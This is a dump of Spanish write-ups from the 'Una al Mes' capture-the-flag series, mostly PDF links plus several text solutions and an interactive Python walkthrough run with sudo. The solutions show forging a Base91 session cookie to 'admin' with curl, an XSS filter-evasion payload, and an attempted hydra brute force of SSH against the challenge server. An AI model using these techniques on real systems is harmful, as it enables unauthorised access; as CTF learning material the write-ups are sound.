/writeups/lacasadepapel/episodio1-1/percu/percu-episodio1-1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-1/percu/percu-episodio1-1.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/rafamartos/rafamartos-episodio1-1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-1/rafamartos/rafamartos-episodio1-1.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/selankon/selankon-episodio1-1.txt:
--------------------------------------------------------------------------------
 1 | Hola! Aquí va el writeup:
 2 | 
 3 | 1. En la pagina vemos que en el código html te sugieren 1234/1234 como
 4 | password, pero al probarlo el resultado es negativo.
 5 | 
 6 | 2. Al analizar los documentos descargados vemos que se descarga un
 7 | archivo login.js. Al analizar este archivo vemos que es la lógica de la
 8 | comprobación de la password:
 9 | 
10 | var Password =
11 | "unescape%28String.fromCharCode%252880%252C%2520108%252C%252097%252C%2520110%2529%29:KZQWYZLOMNUWC===";
12 | 
13 | 3. Claramente vemos que se compone de dos partes:
14 | a) URL encoding
15 | unescape%28String.fromCharCode%252880%252C%2520108%252C%252097%252C%2520110%2529%29
16 | 
17 | b) Base 32
18 | KZQWYZLOMNUWC===
19 | 
20 | En el código javascript vemos que el delimitador es ":", por tanto lo
21 | que hay antes de los ":" puede ser el primer pin y lo segundo es el
22 | segundo pin.
23 | 
24 | 4. PRIMER PIN: buscamos un descrypter para url encoding, por ejemplo
25 | este: https://www.browserling.com/tools/url-decode. Al decodificar un
26 | par de veces vemos que el resultado es el siguiente:
27 | unescape(String.fromCharCode(80, 108, 97, 110))
28 | 
29 | He comprobado la documentación de la función fromCharCode(),
30 | https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/fromCharCode
31 | , vemos que devuelve una string. Así que simplemente he ejecutado esa
32 | función (o en un jsfiddle o en un documento html, es lo mismo...):
33 | 
34 | console.log(String.fromCharCode(80, 108, 97, 110))
35 | 
36 | Y devuelve:
37 | Plan
38 | 
39 | SEGUNDO PIN:
40 | $ echo "KZQWYZLOMNUWC===" | base32 -d
41 | Valencia
42 | 
43 | 5. Al poner los pins, recibimos la password del zip (captura de pantalla
44 | adjuntada)
45 | 
46 | 6. Descargamos el fichero, y lo ejecutamos con wine. Vemos un mensaje de
47 | error que nos indica que la fecha es errónea:
48 | System_Date: 05/20/18
49 | Wrong date R3m0!
50 | 
51 | 7. Deducimos que la fecha correcta está en el fichero, con formato
52 | mm/dd/yy .
53 | $ strings episodio1.exe | grep -E '[0-9][0-9]\/[0-9][0-9]\/[0-9][0-9]'
54 | 01/23/89
55 | 
56 | 8. Cambiamos la fecha del sistema al día de 01/23/89. Será la fecha de
57 | aniversario de mr Rem0? Al ejecutar..:
58 | $ date
59 | lun ene 23 10:45:08 CET 1989
60 | 
61 | $ wine episodio1.exe
62 | fixme:ntdll:find_reg_tz_info Can't find matching timezone information in
63 | the registry for bias -60, std (d/m/y): 24/09/1989, dlt (d/m/y): 26/03/1989
64 | 
65 | Congratulation!!, Stealing Money $$$...
66 | ----------------------------
67 | Stolen: 1.000.000.000 $
68 | ----------------------------
69 | Flag: e30f35ad8d9cb6efc0778539a669fa85
70 | ...........................................
71 | Pulse cualquier tecla para continuar...
72 | 
73 | En la plataforma hay que poner el flag en formato:
74 | 
75 | UAM{e30f35ad8d9cb6efc0778539a669fa85}
76 | 


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/socialkas/socialkas-episodio1-1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-1/socialkas/socialkas-episodio1-1.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-1/victormanuelleyva/victormanuelleyva-episodio1-1.txt:
--------------------------------------------------------------------------------
 1 | codigo fuente-- javascript unescape unicode base32 solucion Plan::Valencia da como resultado PR0F3S0R&R10
 2 | 
 3 | 
 4 | Bueno, en primer lugar enhorabuena por la nueva plataforma.
 5 | 
 6 | En primer lugar he accedido a la web del reto en la que pedían dos códigos, como siempre he mirado el código y he visto que habían un script "login.js"
 7 | 
 8 | /*
 9 | 
10 | function conexion(){
11 |     var Password = "unescape%28String.fromCharCode%252880%252C%2520108%252C%252097%252C%2520110%2529%29:KZQWYZLOMNUWC===";
12 |     for (i = 0; i < Password.length; i++)
13 |     {
14 |         if (Password[i].indexOf(code1) == 0)
15 |         {
16 |             var TheSplit = Password[i].split(":");
17 |             var code1 = TheSplit[0];
18 |             var code2 = TheSplit[1];
19 |     }
20 | }
21 | 
22 | */
23 | 
24 | Primero he recurrido a la web http://www.utilities-online.info/urlencode/ para decodificar la parte de código que estaba codificada con unescape, dos veces, obteniendo como resultado:
25 | 
26 | unescape(String.fromCharCode(80, 108, 97, 110)):KZQWYZLOMNUWC===
27 | 
28 | Donde se "codifica tanto el código 1 como el código 2, por lo que he recurrido a cyberchef para decodificar el base32 dando como resultado Valencia y por otro lado, al ser caracteres unicode 80, 108, 97, 110, he recurrido al viejo truco súper secreto de pulsar la tecla Alt mas la cifra xD 
29 | 
30 | Toda vez que tenemos la pass PR0F3S0R&R10 (que con la prisa pensaba que había que reventar con fuerza bruta en primer lugar... xD) obtenemos el exe.
31 | 
32 | Bien, al no tener herramientas para debbugear w64, he intentado hacerlo con radare... no me ha dado el cerebro, así que he buscado como hacerlo a las bravas y he descubierto dos cosas, una es que se pueden extraer todas las strings del exe mediante:
33 | 
34 | strings episodio1.exe > strings.txt 
35 | 
36 | de ahí podría haber deducido ya la flag puesto que la daba en orden pero realmente no deduces como funciona el programa que, por otro lado no tenía manera de ejecutar, así que buscando he descubierto que hay una versión idafree70_linux.run que me he bajado, instalado, ejecutado et voilà, voy al salto y veo que la fecha 01/23/89 es la flag, así que md5online y a enviar.
37 | 
38 | Bueno, un saludo y gracias! 
39 | 


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-2/bicacaro/bicacaro-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-2/bicacaro/bicacaro-episodio1-2.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-2/darkeagle/darkeagle-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-2/darkeagle/darkeagle-episodio1-2.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-2/j0n3/j0n3-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-2/j0n3/j0n3-episodio1-2.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-2/oreos/oreos-episodio1-2.txt:
--------------------------------------------------------------------------------
 1 | NICK: oreos
 2 | 
 3 | SOLUCIÓN: Episodio 1 - 2ª Parte
 4 | 
 5 | 1. Accedemos a la URL del reto: http://34.247.69.86/lacasadepapel/episodio1/2da_parte.php
 6 | 
 7 | $ curl http://34.247.69.86/lacasadepapel/episodio1/2da_parte.php
 8 | 
 9 | 2. Observamos un formulario.
10 | 
11 | <form action="2da_parte.php" method="post" align="middle">
12 | <div>
13 | <input type="text" id="flag" name="flag"/>
14 | <label for="flag">Flag</label>
15 | </div>
16 | <div>
17 | <input type="submit" value="Enviar" class="button"/>
18 | </div>
19 | <div>
20 | <p>Debes introducir el MD5 de la flag de la primera parte para acceder a esta segunda.</p>
21 | </div>
22 | </form>
23 | 
24 | 3. Enviamos en el campo "flag" la bandera del reto anterior.
25 | 
26 | $ curl http://34.247.69.86/lacasadepapel/episodio1/2da_parte.php -X POST -F 'flag=e30f35ad8d9cb6efc0778539a669fa85' -v
27 | 
28 | 4. Observamos que recibimos una cookie del servidor:
29 | 
30 | < HTTP/1.1 100 Continue
31 | < HTTP/1.1 200 OK
32 | < Date: Mon, 28 May 2018 08:05:02 GMT
33 | < Server: Apache/2.4.25 (Debian)
34 | < Set-Cookie: acceso=4a7g%3F%5B%5D%40r%25y; expires=Mon, 28-May-2018 09:05:02 GMT; Max-Age=3600
35 | < Refresh: 0
36 | < Vary: Accept-Encoding
37 | < Content-Length: 1305
38 | < Content-Type: text/html; charset=UTF-8
39 | 
40 | 5. Repetimos la llamada con la cookie obtenida:
41 | 
42 | $ curl http://34.247.69.86/lacasadepapel/episodio1/2da_parte.php --cookie "acceso=4a7g%3F%5B%5D%40r%25y"
43 | 
44 | <h3>Acceso no autorizado a la información clasificada</h3>
45 | 
46 | 6. El valor de 'acceso' parece estar codificado.
47 | 
48 | - Decodificamos el valor en Base91:
49 | 
50 | B91Decode(4a7g%3F%5B%5D%40r%25y) = B91Decode(4a7g?[]@r%y) = visitante
51 | 
52 | - Codificamos la cadena 'admin' en Base91:
53 | 
54 | B91Encode(admin) = dMLg7=A
55 | 
56 | 7. Repetimos la llamada con la cookie modificada:
57 | 
58 | $ curl http://34.247.69.86/lacasadepapel/episodio1/2da_parte.php --cookie "acceso=dMLg7=A"
59 | 
60 | <h3 class="text">El codigo para descomprimir el zip está claro... ApdnioimcuFqoftnpSBLLeugbu</h3>
61 | 
62 | 8. El texto obtenido parece estar cifrado, probamos distintos algoritmos hasta dar con el correcto:
63 | 
64 | Playfair: http://rumkin.com/tools/cipher/playfair.php
65 | 
66 | PlayfairDecode(ApdnioimcuFqoftnpSBLLeugbu) = ElcodigoesAllisonUAMParker
67 | 
68 | 9. Usamos la clave 'AllisonUAMParker' para descomprimir el zip.
69 | 
70 | $ 7z e flag.zip
71 | 
72 | 10. Obtenemos la flag
73 | 
74 | $ cat flag.txt
75 | 
76 | UAM{c9beec67d71c56a0f9b683fe5232e76e}
77 | 


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio1-2/rafamartos/rafamartos-episodio1-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio1-2/rafamartos/rafamartos-episodio1-2.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio2/cesarjz/cesarjz-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio2/cesarjz/cesarjz-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio2/darkeagle/darkeagle-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio2/darkeagle/darkeagle-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio2/j0n3/j0n3-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio2/j0n3/j0n3-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio2/percu/percu-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio2/percu/percu-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio2/rafamartos/rafamartos-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio2/rafamartos/rafamartos-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio2/victormanuelleyva/victormanuelleyva-episodio2.txt:
--------------------------------------------------------------------------------
 1 | UAM EPISODIO 2
 2 | 
 3 | Arrancamos desde la URL http://34.247.69.86/lacasadepapel/episodio2/index.html, donde nos encontramos un "chat" donde presuntamente podemos escribir lo que queramos y s enos dice que tengamos cuidado porque todo será leído por ellos.
 4 | En primer lugar me miré todo el código fuente y los scripts de la web, estuve dandole un par de vueltas al script game-frame.js, en la intención de que de algo valía. Tras ver que no valía para nada, estudio el otro y entonces caí en que el tema está en que "lee todo lo que ponemos"
 5 | 
 6 | Comienzo escribiendo todo tipo de caracteres y al no recibir respuesta empiezo a probar hasta que me doy cuenta de que si envío texto entre llaves <texto>, no muestra nada y ahí se me encendió la luz pero el ánsia me llevó a pulsar las hints y confirmar lo que ya sabía pero no confiaba en lo que creía.
 7 | 
 8 | Comienzo a buscar el payload, tiro de https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet hasta que detecto que <IMG SRC=# onmouseover="alert('xxs')"> me da el password "OsLoHaPerDidOaSuPrImo" para el zip, no sin antes darme de bruces varias veces hasta darme cuenta de que la I no era una L... cosas de la tipografía y mi cerebro.
 9 | 
10 | Una vez que descomprimimos el zip nos enconramos el archivo episodio2.wav con un sonido irrelevante por lo que enseguida voy a generador de espectrograma de sonido 
11 | 
12 | 
13 | http://convert.ing-now.com/mp3-audio-waveform-graphic-generator/download/spectrogram/7e108ff8b20b1c6cb61c9350fd1c149f/?v=1529099356219/
14 | 
15 | Donde se nos muestran las cordenadas 40.441186 -3.687506, que nos llevan La Casa de Papel, pero, tras probar n veces el hash resultante de La Casa de Papel, de Csic, incluso pensé en pasar matrículas que se ven en las fotos de google maps, se nos reveló una sutil pista, un paso atrás... así que, hash de las cordenadas y listo!
16 | 
17 | Muy entretenido, gracias admins!
18 | 


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio3/bicacaro/bicacaro-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio3/bicacaro/bicacaro-episodio3.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio3/blueudp/blueudp-episodio3.py:
--------------------------------------------------------------------------------
  1 | #Copiame en un archivo .py, ejecutame con python3
  2 | #
  3 | #
  4 | #
  5 | try:
  6 |     import os
  7 | except ImportError:
  8 |     print("Error importing 'os'")
  9 |     exit()
 10 | try:
 11 |     import hashlib
 12 | except ImportError:
 13 |     print("Error importing 'hashlib'")
 14 |     exit()
 15 |     
 16 |     
 17 | if os.getuid() is not 0:
 18 |     print("Necesito sudo para montar particiones y crear directorios!")
 19 |     exit()
 20 |     
 21 | print("Una al Mes #5 Write-Up")
 22 | print("Write-up Interactivo Por Blueudp\n")
 23 | print("Lo primero que nos encontramos en la plataforma es un texto que dice:")
 24 | print("""Con todo el dinero robado, necesitamos escapar dando una distracción 
 25 | a la policia. Para ello, hace falta encontrar la bomba programada en el \033[1;33;40mfirmware
 26 | del sistema informático. Una vez resuelta, podremos acceder al servidor\033[0m, donde 
 27 | tras buscar bien, conseguiremos la flag final y escaparemos con el premio. [Pulsa Enter]: """)
 28 | f = input(" ")
 29 | print("Posteriormente, descargamos el '.zip' que nos ofrecen [Pulsa Enter]: ")
 30 | f = input(" ")
 31 | 
 32 | os.system("clear")
 33 | 
 34 | print("Downloading .zip...")
 35 | 
 36 | os.system("wget https://unaalmes.hispasec.com/files/92b2478b76c8ccf43f8fb2c4814faab3/firmware.zip")
 37 | os.system("clear")
 38 | 
 39 | print("Descargado!!! [Pulsa Enter]: ")
 40 | f = input(" ")
 41 | print("Lo siguiente, lógicamente, es descomprimir el zip: ")
 42 | print("unzip firmware.zip\n")
 43 | 
 44 | os.system("unzip firmware.zip")
 45 | 
 46 | print("""\nUna vez descomprimido vemos un archivo '.raw', le hacemos un file
 47 | y nos damos cuenta que es una partición ext4""")
 48 | print("\nfile backup.raw")
 49 | 
 50 | os.system("file backup.raw")
 51 | 
 52 | print("\nAl ser una partición ext4, procedemos a montarla [Pulsa Enter]: ")
 53 | f = input(" ")
 54 | print("Montada!")
 55 | 
 56 | os.system("mkdir /media/DISK1")
 57 | os.system("sudo mount -t ext4 backup.raw /media/DISK1")
 58 | 
 59 | f = input("Presione enter para hacer un 'ls -a' y ver los archivos: ")
 60 | print("\n")
 61 | 
 62 | os.system("ls -a /media/DISK1")
 63 | 
 64 | print("""El archivo '.bomb' es la bomba, asi que necesitamos el código, para ello
 65 | primero la desempaquetaremos con upx 'upx -d .bomb' [Pulsa Enter]: """)
 66 | f = input(" ")
 67 | 
 68 | os.system("sudo upx -d /media/DISK1/.bomb")
 69 | 
 70 | print("Posteriormente, hacemos un strings para ver la pass [Pulsa Enter]: ")
 71 | f = input(" ")
 72 | 
 73 | os.system("strings /media/DISK1/.bomb")
 74 | 
 75 | print("Por el medio del fichero pone 'italy', prueba a insertar esa pass en la bomba. [Pulsa Enter] (Tendrás que esperar 1 min): ")
 76 | f = input(" ")
 77 | 
 78 | os.system("/media/DISK1/.bomb")
 79 | 
 80 | print("""\nBien!, tienes un string algo raro, si le quitas las barra bajas
 81 | verás que es un hash md5 el cual, una vez crackeado, contiene la ip del server  [Pulsa Enter]: """)
 82 | f = input(" ")
 83 | print("La ip es http://95.216.138.194/ (crackeado con 'https://www.md5online.es/')     [Pulsa Enter]: ")
 84 | f = input(" ")
 85 | print("Procedemos a entrar [Pulsa Enter]: ")
 86 | f = input(" ")
 87 | os.system("wget https://95.216.138.194")
 88 | print("\nwget dice que el certificado del propietario con coincide con el host que pusimos... Vamos a ver cual es el propietario [Pulsa Enter]: ")
 89 | f = input(" ")
 90 | print("Al pasar la ip por 'https://www.sslshopper.com', nos dice que el propietario es 'lacasadepapel.cloud', probaremos a asignar la ip que nos dieron con ese propietario a ver si funciona [Pulsa Enter]: ")
 91 | f = input(" ")
 92 | print("Para ello, añadimos esta linea a /etc/hosts: '95.216.138.194 lacasadepapel.cloud' <- copiala [Pulsa Enter para abrir /etc/hosts/]: ")
 93 | f = input(" ")
 94 | 
 95 | os.system("sudo nano /etc/hosts")
 96 | 
 97 | print("Una vez editado, probamos a hacer una petición a 'lacasadepapel.cloud', pero con la opción de no revisar el certificado, disponible en curl (-k) y wget (--no-check-certificate) [Pulsa Enter]: ")
 98 | f = input(" ")
 99 | os.system("curl -k https://lacasadepapel.cloud")
100 | print("\nRayos!, un index con dos audios, procedemos a descargarlos [Pulsa Enter]: ")
101 | f = input(" ")
102 | 
103 | os.system("wget --no-check-certificate https://lacasadepapel.cloud/audio/Bella_Ciao.mp3")
104 | os.system("wget --no-check-certificate https://lacasadepapel.cloud/audio/Bella_Cia0.wav")
105 | 
106 | print("Si te fijas, en el .wav hay un morse algo flojito, y en el mp3 está la misma canción, pero sin el morse")
107 | print("Hay un tipo de auriculares 'con supresión de ruido' que captan el sonido por el micrófono y lo emiten (con las ondas al revés) por los altavoces, como nosotros tenemos dos audios iguales, pero con un pequeño sonido diferente podemos aplicar la misma técnica, y así, quedará el morse limpio [Pulsa Enter]: ")
108 | 
109 | f = input(" ")
110 | 
111 | print("¿Como se hace eso?, abre audacity y añade los dos archivos de sonido, selecciona uno de ellos y ve a efectos > invertir, no notarás nada, pero al darle a play.. Solo se escucha el morse!, (al principio del audio no se escuhará nada), asi que solo queda decodearlo, para ello vamos a una web para ello, el resultado será: 'laflagesbellaciaoremoenmd5' , así que hasheamos 'bellaciaoremo', añadimos UAM{} y... Listo! [Pulsa Enter]: ")
112 | 
113 | f = input(" ")
114 | hashear=""
115 | while "bellaciaoremo" not in hashear:
116 |     hashear = input("Inserta bellaciaoremo para cifrarlo en md5: ")
117 |     if "bellaciaoremo" in hashear:
118 |         m = hashlib.md5()
119 |         m.update(hashear.encode('utf-8'))
120 |         print("\nEl hash es: '{}'".format(m.hexdigest()))
121 |         print("\nGracias por leer este chapuzero write-up, espero que hayais aprendido con el.\nun saludo a los admins y a los compañeros de UAM!\n yo me voy a ver la casa de papel")
122 |         exit()  
123 |     else:
124 |         print("Esa no es la string a cifrar!")
125 | 


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio3/cesarjz/cesarjz-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio3/cesarjz/cesarjz-episodio3.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio3/darkeagle/darkeagle-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio3/darkeagle/darkeagle-episodio3.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio3/j0n3/j0n3-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/lacasadepapel/episodio3/j0n3/j0n3-episodio3.pdf


--------------------------------------------------------------------------------
/writeups/lacasadepapel/episodio3/victormanuelleyva/victormanuelleyva-episodio3.txt:
--------------------------------------------------------------------------------
  1 | UAM _La_Casa_de_Papel_Final_Season.
  2 | 
  3 | 
  4 | En primer lugar descargamos y analizamos con blink el firmware
  5 | 
  6 | luego encontramos la carpeta con la bomba
  7 | analizamos la bomba hasta darnos cuenta de que hay que desempacarla
  8 | 
  9 | 
 10 | upx -d .bomb
 11 | 
 12 | y vemos que la pass es italy 
 13 | 
 14 | nos devuelve 
 15 | 
 16 | _dbf7c981d7e_fe8_c462eab3c39_f2b06_fd
 17 | 
 18 | 
 19 | 
 20 | quitamos los guiones y al ser 32 caracteres sospecho de que es un md5, probamos en md5online e voila
 21 | 
 22 | http://95.216.138.194/
 23 | 
 24 | 
 25 | 
 26 | nos pide un certificado, me pongo a autofirmar uno pero no funciona
 27 | 
 28 | lanzo un nmap para ver puertos, veo ssh, 443, 80 y creo que ftp también, pruebo fuerza bruta con hydra al ssh tirando de rockyou... nada, tiro de todas las posibilidades que se me ocurren con curl, wget, intentando descargar algo que me de una señal.
 29 | 
 30 | Pruebo curl con ssl 
 31 | 
 32 | root@kali:~# curl -k https://95.216.138.194/
 33 | <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
 34 | <html><head>
 35 | <title>301 Moved Permanently</title>
 36 | </head><body>
 37 | <h1>Moved Permanently</h1>
 38 | <p>The document has moved <a href="http://95.216.138.194">here</a>.</p>
 39 | <hr>
 40 | <address>Apache/2.4.25 (Debian) Server at 95.216.138.194 Port 443</address>
 41 | </body></html>
 42 | root@kali:~# 
 43 | 
 44 | intento bajar algo con wget y me dice que no tengo permiso, que mis certificados le dan la risa, investigo por internet como pasar de eso y obtengo las cabeceras:
 45 | 
 46 | oot@kali:~# wget --no-check-certificate -S https://95.216.138.194/ -O - > /dev/null 
 47 | --2018-07-19 00:17:12--  https://95.216.138.194/
 48 | Conectando con 95.216.138.194:443... conectado.
 49 | AVISO: El certificado de “95.216.138.194” no es confiable.
 50 | AVISO: El certificado de “95.216.138.194” no tiene un emisor conocido.
 51 | El propietario del certificado no se ajusta al nombre de equipo “95.216.138.194”
 52 | Petición HTTP enviada, esperando respuesta... 
 53 |   HTTP/1.1 301 Moved Permanently
 54 |   Date: Wed, 18 Jul 2018 22:17:12 GMT
 55 |   Server: Apache/2.4.25 (Debian)
 56 |   Strict-Transport-Security: max-age=63072000; includeSubdomains
 57 |   X-Frame-Options: DENY
 58 |   X-Content-Type-Options: nosniff
 59 |   Location: http://95.216.138.194
 60 |   Content-Length: 310
 61 |   Keep-Alive: timeout=5, max=100
 62 |   Connection: Keep-Alive
 63 |   Content-Type: text/html; charset=iso-8859-1
 64 | Localización: http://95.216.138.194 [siguiendo]
 65 | --2018-07-19 00:17:12--  http://95.216.138.194/
 66 | Conectando con 95.216.138.194:80... conectado.
 67 | Petición HTTP enviada, esperando respuesta... 
 68 |   HTTP/1.1 400 Bad Request
 69 |   Date: Wed, 18 Jul 2018 22:17:13 GMT
 70 |   Server: Apache/2.4.25 (Debian)
 71 |   Strict-Transport-Security: max-age=63072000; includeSubdomains
 72 |   X-Frame-Options: DENY
 73 |   X-Content-Type-Options: nosniff
 74 |   Content-Length: 437
 75 |   Connection: close
 76 |   Content-Type: text/html; charset=iso-8859-1
 77 | 2018-07-19 00:17:13 ERROR 400: Bad Request.
 78 | 
 79 | Mientras pienso y pruebo me doy cuenta que con el navegador, si voy al 443 cambia el error y pasa de indicar que el server esta en home a que está en lacasadepapel.cloud, lo mismo que ponia en los certificados.
 80 | 0 s:/C=ES/ST=Some-State/O=La Casa de Papel SL/OU=Films and Fun!/CN=lacasadepapel.cloud/emailAddress=info@lacasadepapel.cloud
 81 | 
 82 | 
 83 | 
 84 | Usando Burp, con el proxy rescato las cabeceras GET
 85 | 
 86 | GET / HTTP/1.1
 87 | Host: 95.216.138.194:443
 88 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
 89 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 90 | Accept-Language: en-US,en;q=0.5
 91 | Accept-Encoding: gzip, deflate
 92 | Connection: close
 93 | Upgrade-Insecure-Requests: 1
 94 | 
 95 | Entonces copio para curl y obtengo mismos resultados, bad request, así que pruebo a enviar un POST con repeater de BURP, para ver que obtengo y sorpresa! 
 96 | 
 97 | HTTP/1.1 200 OK
 98 | Date: Wed, 18 Jul 2018 22:47:35 GMT
 99 | Server: Apache/2.4.25 (Debian)
100 | Strict-Transport-Security: max-age=63072000; includeSubdomains
101 | X-Frame-Options: DENY
102 | X-Content-Type-Options: nosniff
103 | Last-Modified: Wed, 11 Jul 2018 15:25:56 GMT
104 | ETag: "131-570badcf46493-gzip"
105 | Accept-Ranges: bytes
106 | Vary: Accept-Encoding
107 | Content-Length: 305
108 | Connection: close
109 | Content-Type: text/html
110 | 
111 | <html>
112 | <head>
113 | 	<title>La casa de papel</title>
114 | </head>
115 | <body bgcolor="black">
116 | <!-- <audio src="audio/Bella_Ciao.mp3"></audio> -->
117 | <center>
118 | 	<audio controls>
119 | 		<source src="audio/Bella_Cia0.wav" type="audio/mp4">
120 | 	</audio>
121 | </center>
122 | <br />
123 | <center>
124 | 	<img src="images/back.jpg" />
125 | </center>
126 | </body>
127 | </html>
128 | 
129 | 
130 | Así que... wget recursivo para obtener los archivos (ahí cometí un error, no vi dos archivos de audio, mi mente solo vió dos y por eso estuve dando mil vueltas con el morse posteriormente)
131 | 
132 | wget --no-check-certificate  --header="Host: 95.216.138.194:443" https://95.216.138.194 (al final caí en tener que hacerlo a la url https://95.216.138.194/audio/ para poder bajar el mp3.
133 | 
134 | Una vez solventado el hecho de que me faltaba el mp3 y dada la cantidad de cabezazos que me había dado con el wav, en base a las hints que dieron los admins por el canal, tiro de audacity, detecté el morse e intenté hacerlo a las brabas, evidentemente sin el mp3 era inviable, pero toda vez que lo obtuve y remendé mi error, tiré de audacity nuevamente e investigué como borrar una "parte" de una canción.
135 | 
136 | Tiré del proceso manual para eliminar voces (invertir una pista) y se quedó mas nítido el morse, corté la sección de la canción, generé el spectograma, jugué con la ganancia, límites de frecuencia y db para obtener algo lo más nítido posible que cuadrara un poco con el morse que mi viejo oído de scout xDDD intuía, con eso y con cyberchef obtuve la flag:
137 | 
138 | LAFLAGESBELLACIAOREMOENMD5
139 | 
140 | 
141 | Brutal, divertido y he aprendido un huevo sobre certificados, nmap, metasploit al intentar reventar el ssh, de audacity...
142 | 
143 | Gracias pero algún día me tomaré mi venganza.
144 | 
145 | Un saludo.
146 | 
147 | Victor.
148 | eternaln00b
149 | 
150 | 
151 | 
152 | 
153 | 
154 | 
155 | 
156 | 
157 | 
158 | 
159 | 


--------------------------------------------------------------------------------
/writeups/matrix/episodio1/bicacaro/bicacaro-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/matrix/episodio1/bicacaro/bicacaro-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/matrix/episodio1/darkeagle/darkeagle-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/matrix/episodio1/darkeagle/darkeagle-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/matrix/episodio1/julianjm/julianjm-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/matrix/episodio1/julianjm/julianjm-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/matrix/episodio1/nachinho3/nachinho3-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/matrix/episodio1/nachinho3/nachinho3-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/matrix/episodio2/darkeagle/darkeagle-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/matrix/episodio2/darkeagle/darkeagle-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/matrix/episodio2/julianjm/julianjm-episodio2.md:
--------------------------------------------------------------------------------
  1 | # UAM - Matrix - Episode 2
  2 | 
